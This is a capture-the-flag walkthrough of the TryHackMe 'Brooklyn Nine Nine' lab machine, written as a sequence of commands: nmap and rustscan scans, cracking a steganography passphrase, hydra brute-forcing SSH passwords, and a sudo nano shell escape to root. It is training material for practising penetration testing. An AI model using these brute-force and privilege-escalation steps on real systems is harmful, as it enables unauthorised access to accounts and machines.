Brooklyn Nine Nine


Last updated 1 year ago

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Brooklyn99
cd ~/Documents/TryHackMe/eJPT/Brooklyn99
mkdir recon enumeration notes
touch {README.md,vulns,creds}

export IP=10.10.106.147
export URL=http://$IP

Enumeration

The first thing I do on a new machine is scan for open ports, with both rustscan and nmap.

  • rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
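The one-liner above turns the first nmap run into the comma-separated port list that the second run's -p expects. The function below does the same thing as an added example (not code from the original writeup): it anchors the match on the "port/proto  open" line format so that "filtered" entries and banner lines containing the word "open" are not picked up. The scan output it runs on is constructed for the example, not captured from the target.

```bash
#!/usr/bin/env bash
# Added example: extract open ports from an nmap -oN (normal format) file
# into the "21,22,80" form that nmap -p accepts.

# Read nmap -oN output on stdin, print open TCP/UDP ports comma-separated.
open_ports() {
  # Only rows shaped like "21/tcp    open     ftp"; skips the
  # "Not shown: ... closed" line and any "filtered" ports.
  grep -E '^[0-9]+/(tcp|udp) +open ' \
    | cut -d '/' -f 1 \
    | paste -sd ',' -
}

# Constructed sample of an nmap -oN file (assumption: not the real scan).
SAMPLE_SCAN='# Nmap 7.94 scan initiated as: nmap -Pn -p- -oN recon/nmap.init 10.10.106.147
Nmap scan report for 10.10.106.147
Host is up (0.040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
8080/tcp  filtered http-proxy
# Nmap done -- 1 IP address (1 host up) scanned'

printf '%s\n' "$SAMPLE_SCAN" | open_ports   # prints 21,22,80
```

In the workflow above this replaces the cat/grep/cut/tr/sed chain: `open_ports < recon/nmap.init > recon/ports`, and the targeted service scan reads `-p $(cat recon/ports)` as before.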

Check the default page on the web server. Its source contains an interesting comment:

<!-- Have you ever heard of steganography? -->

So download the image and run a stego tool against it. stegseek cracks the steghide passphrase with a wordlist:

stegseek --crack brooklyn99.jpg ~/Documents/rockyou.txt

admin --> password

The passphrase is admin. stegseek writes the embedded file next to the image (brooklyn99.jpg.out), and it contains the password of a second SSH user (holt, see below).

Keep in mind that the path I used for the rockyou wordlist might differ from yours.

When port 80 is open I usually brute force files and directories, but that turned up nothing here. FTP, on the other hand, accepts the anonymous login, and what is on the share reveals that Jake has a weak password. So brute force his SSH login:

hydra -l jake -P ~/Documents/rockyou.txt ssh://$IP

That gives two users, each with a password that works over SSH.

Exploitation

Connect over SSH; the user flag is in holt's home directory.

Running sudo -l shows that nano can be run as root through sudo. GTFOBins lists a shell escape for exactly that: start nano under sudo, press ^R (read file) then ^X (execute command), and from the command prompt spawn a shell with its input and output pointed back at the terminal.

sudo nano
^R^X
reset; sh 1>&0 2>&0